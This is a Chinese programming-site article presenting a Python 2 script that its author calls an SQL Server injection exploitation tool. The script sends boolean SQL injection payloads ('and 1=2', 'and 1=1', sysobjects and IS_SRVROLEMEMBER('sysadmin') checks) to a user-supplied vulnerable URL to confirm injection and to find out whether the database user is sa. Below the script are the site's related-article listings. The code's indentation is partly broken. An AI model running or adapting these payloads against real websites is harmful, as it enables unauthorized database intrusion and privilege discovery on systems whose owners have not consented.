编程 Python

Python编写检测数据库SA用户的方法

Posted in Python onJuly 11, 2014

本文讲述一个用Python写的小程序，用于有注入点的链接，以检测当前数据库用户是否为sa，详细代码如下：

# Code by zhaoxiaobu Email: little.bu@hotmail.com  
#-*- coding: UTF-8 -*-  
from sys import exit  
from urllib import urlopen  
from string import join,strip  
from re import search  
 
def is_sqlable(): 
  sql1="%20and%201=2" 
  sql2="%20and%201=1" 
  urlfile1=urlopen(url+sql1) 
  urlfile2=urlopen(url+sql2) 
  htmlcodes1=urlfile1.read() 
  htmlcodes2=urlfile2.read() 
  if not search(judge,htmlcodes1) and search(judge,htmlcodes2): 
  print "[信息]恭喜!这个URL是有注入漏洞的!n" 
  print "[信息]现在判断数据库是否是SQL Server,请耐心等候....."  
  is_SQLServer() 
  else: 
  print "[错误]你确定这个URL能用?换个别的试试吧!n"

def is_SQLServer(): 
  sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
  urlfile=urlopen(url+sql) 
  htmlcodes=urlfile.read() 
  if not search(judge,htmlcodes): 
  print "[错误]数据库好像不是SQL Server的!n" 
  else: 
  print "[信息]确认是SQL Server数据库!n" 
  print "[信息]开始检测当前数据库用户权限,请耐心等待......" 
  is_sysadmin() 
 
 
def is_sysadmin():  
  sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print "[错误]当前数据库用户不具有sysadmin权限!n" 
  else:  
    print "[信息]当前数据库用户具有sysadmin权限!n" 
    print "[信息]检测当前用户是不是SA,请耐心等待......" 
    is_sa()  
 
def is_sa():  
  sql = "%20and%20'sa'=(select%20System_user)"; 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print "[错误]当前数据库用户不是SA!n" 
  else:  
    print "[信息]当前数据库用户是SA!n" 
 
print "n########################################################################n"  
print "            ^o^SQL Server注入利用工具^o^     "  
print "           Email: little.bu@hotmail.comn"  
print "========================================================================";  
url = raw_input('[信息]请输入一个可能有注入漏洞的链接!nURL:')  
if url == '':  
  print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式"  
  exit(1)  
 
judge = raw_input("[信息]请提供一个判断字符串.n判断字符串:")  
if judge == '':  
  print "[错误]判断字符串不能为空!"  
  exit(1)  
 
is_sqlable()

- Author -

shichen2014

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

儿童python练习实例

May 27 Python

解决PyCharm同目录下导入模块会报错的问题

Oct 13 Python

Python图像的增强处理操作示例【基于ImageEnhance类】

Jan 03 Python

OpenCV搞定腾讯滑块验证码的实现代码

May 18 Python

详解Python3迁移接口变化采坑记

Oct 11 Python

pytorch制作自己的LMDB数据操作示例

Dec 18 Python

PyTorch实现AlexNet示例

Jan 14 Python

Python实现新型冠状病毒传播模型及预测代码实例

Feb 05 Python

使用 pytorch 创建神经网络拟合sin函数的实现

Feb 24 Python

python批量处理多DNS多域名的nslookup解析实现

Jun 28 Python

Python爬取12306车次信息代码详解

Aug 12 Python

Python爬取数据并实现可视化代码解析

Aug 12 Python

python实现的生成随机迷宫算法核心代码分享（含游戏完整代码）

Jul 11 #Python

python文件和目录操作函数小结

Jul 11 #Python

python实现的登陆Discuz!论坛通用代码分享

Jul 11 #Python

Python Socket编程入门教程

Jul 11 #Python

python使用正则搜索字符串或文件中的浮点数代码实例

Jul 11 #Python

Python实现的二维码生成小软件

Jul 11 #Python

让python同时兼容python2和python3的8个技巧分享

Jul 11 #Python

You might like

PHP 采集心得技巧

2009/05/15 PHP

有道搜索和IP138的IP的API接口(PHP应用)

2012/11/29 PHP

基于php缓存的详解

2013/05/15 PHP

判断php数组是否为索引数组的实现方法

2013/06/13 PHP

PHP+Mysql基于事务处理实现转账功能的方法

2015/07/08 PHP

jquery 合并内容相同的单元格(示例代码)

2013/12/13 Javascript

JS获取各种浏览器窗口大小的方法

2014/01/14 Javascript

jQuery使用post方法提交数据实例

2015/03/25 Javascript

javascript实现倒计时并弹窗提示特效

2015/06/05 Javascript

JS绘制生成花瓣效果的方法

2015/08/05 Javascript

AngularJs Creating Services详解及示例代码

2016/09/02 Javascript

js style.display=block显示布局错乱问题的解决方法

2016/09/21 Javascript

webpack file-loader和url-loader的区别

2019/01/15 Javascript

微信小程序Flex布局用法深入浅出分析

2019/04/25 Javascript

JS数组进阶示例【数组的几种函数用法】

2020/01/16 Javascript

JS实现多功能计算器

2020/10/28 Javascript

Python入门篇之正则表达式

2014/10/20 Python

用C++封装MySQL的API的教程

2015/05/06 Python

在Python中处理列表之reverse()方法的使用教程

2015/05/21 Python

Python中操作符重载用法分析

2016/04/29 Python

python使用matplotlib绘图时图例显示问题的解决

2017/04/27 Python

python+selenium开发环境搭建图文教程

2017/08/11 Python

Python将DataFrame的某一列作为index的方法

2018/04/08 Python

Win10+GPU版Pytorch1.1安装的安装步骤

2019/09/27 Python

python如何实现不可变字典inmutabledict

2020/01/08 Python

python selenium自动化测试框架搭建的方法步骤

2020/06/14 Python

Python基础教程（一）——Windows搭建开发Python开发环境

2020/07/20 Python

使用PDF.JS插件在HTML中预览PDF文件的方法

2018/08/29 HTML / CSS

运动会致辞稿50字

2014/02/04 职场文书

飞机制造技术专业求职信

2014/07/27 职场文书

2014统计局民主生活会对照检查材料思想汇报

2014/10/02 职场文书

综合管理员岗位职责

2015/02/11 职场文书

幼儿园家长工作总结2015

2015/04/25 职场文书

医院消毒隔离制度

2015/08/05 职场文书

基于Python和openCV实现图像的全景拼接详细步骤

2021/10/05 Python

项目中Nginx多级代理是如何获取客户端的真实IP地址

2022/05/30 Servers